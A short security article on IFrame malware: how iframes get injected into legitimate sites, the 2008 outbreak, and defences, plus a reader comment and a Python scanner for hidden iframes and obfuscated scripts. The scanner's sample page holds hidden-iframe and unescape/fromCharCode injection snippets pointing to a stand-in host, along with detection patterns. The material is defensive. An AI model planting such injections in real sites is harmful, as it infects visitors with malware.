Be Aware of IFrame Malware
Over the years, the internet has become a haven for malware writers. New strains of infectious code are launched into cyberspace on a frequent basis, and one of the latest threats is IFrame. This malicious nuisance is growing quickly, constantly evolving to threaten not only web surfers, but website owners and hosting providers as well.
What is iFrame?
In its original form, an Inline Frame, or IFrame, doesn’t function with malicious intent. Formed by embedding one HTML document inside another, it is typically used to insert content from other sources into a web page. This could be a simple document or an advertisement. A designer can change the content of an IFrame without needing the user to reload the page. Though it functions like an inline image, it can be configured to have its own features independent of the page it is embedded on. IFrames have been used in various e-commerce applications as well as pages like Google Maps that utilize AJAX and other Java elements. Unfortunately, the mere structure of this technology has allowed it to be used for malicious gain.
[Image: This site is infected by an iframe malware]
The Outbreak
IFrame became a dangerous malware tool in the early part of 2008. It was around this time that several hackers implemented the code into internet search results. This led to IFrame overflow attacks on some of today’s most prominent websites. The sites victimized by this exploit were operated by entities such as ABC News, USA Today, Wal-Mart and ZDNet, among others. By inserting the malicious code into the search results of legitimate sites, the attackers were able to automatically redirect any visitor who clicked on a link provided by the rogue search tool to the infected site. From there, the unknowing user was automatically infected with malware. By compromising so many unsuspecting websites, the malicious IFrame code was able to spread like wildfire and inflict considerable damage in a very short amount of time.
What drives the IFrame malware craze is an effective technique that doesn’t require a hacker to directly attack a web server. Instead, attackers leverage popular, highly search-engine-optimized sites, benefiting not only from their higher rankings but also from the results of whatever the malicious code is designed to do. IFrame is often employed through “drive-by” attacks as well as social engineering techniques that trick users into installing software, such as video codecs, that is actually a Trojan in disguise. IFrame attacks are a major threat to any insecure web server, and particularly to Windows operating systems that have not applied the critical MS04-040 update for Internet Explorer. This essentially means that there are a large number of vulnerable systems out there.
[Image: Example of attacked site]
How to Protect Yourself
Search engine operators such as Google and Yahoo are working diligently to eliminate malware-infested search results and warn internet users about malicious websites. In the meantime, you need to devise strategies to protect your own site. Because these scripts can be embedded without your knowledge, the best protection involves a reliable web hosting service and making sure that your web applications are frequently updated and secure.

Nice article. Hopefully it will open the eyes of your readers.
Website owners should know that oftentimes, the iframe is buried in some obfuscated JavaScript code. This code typically uses a series of concatenated strings, with eval, unescape, fromCharCode and other functions.
Just looking for iframe in your HTML may not be enough to see if you’ve fallen victim. You also have to examine each script tag set to see if it’s something you put there.
We see a lot of different ways of hiding iframes. Examine all code on a regular basis.
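The check described in the comment above can be automated for a site's own pages. The following is an added example, not code from the article or the commenter: it statically flags hidden iframes and script blocks that only reveal an `<iframe` once string joins, `fromCharCode` lists and `%XX` escapes are undone. The names `scan` and `decode_layers`, the finding labels, the 0/1-pixel "hidden" rule, the inclusion of `document.write` and the sample page are all assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Functions named in the comment above; document.write is an added assumption.
SUSPECT = re.compile(r"\b(eval|unescape|fromCharCode|document\.write)\s*\(")
CHARCODES = re.compile(r"fromCharCode\s*\(\s*(\d{1,5}(?:\s*,\s*\d{1,5})*)\s*\)")
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def decode_layers(js):
    """Statically undo string joins, fromCharCode lists and %XX escapes; runs nothing."""
    js = re.sub(r"""['"]\s*\+\s*['"]""", "", js)
    js = CHARCODES.sub(lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), js)
    return unquote(js)

class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.script = [], None  # script: text buffered inside <script>
    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "script":
            self.script = []
        elif tag == "iframe":
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or HIDDEN.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
    def handle_data(self, data):
        if self.script is not None:
            self.script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self.script is not None:
            js, self.script = "".join(self.script), None
            calls = ",".join(sorted(set(SUSPECT.findall(js))))
            hides = "<iframe" in decode_layers(js).lower() and "<iframe" not in js.lower()
            if hides or calls:
                kind = "script-hides-iframe" if hides else "obfuscation-calls"
                self.findings.append((kind, calls))

def scan(html):
    scanner = Scanner()
    scanner.feed(html)
    return scanner.findings

# Constructed sample page: one ordinary embed, one 1x1 frame, two obfuscated scripts.
SAMPLE = """<iframe src="https://maps.example.com/embed" width="400" height="300"></iframe>
<iframe src="http://bad.example.net/x" width="1" height="1"></iframe>
<script>document.write(unescape('%3Cifr' + 'ame src=%22http://bad.example.net/y%22%3E'));</script>
<script>var s = String.fromCharCode(60,105,102,114,97,109,101); eval(s);</script>"""
```

An `obfuscation-calls` finding only means a script uses those functions; it still has to be compared against what the site owner knowingly put on the page.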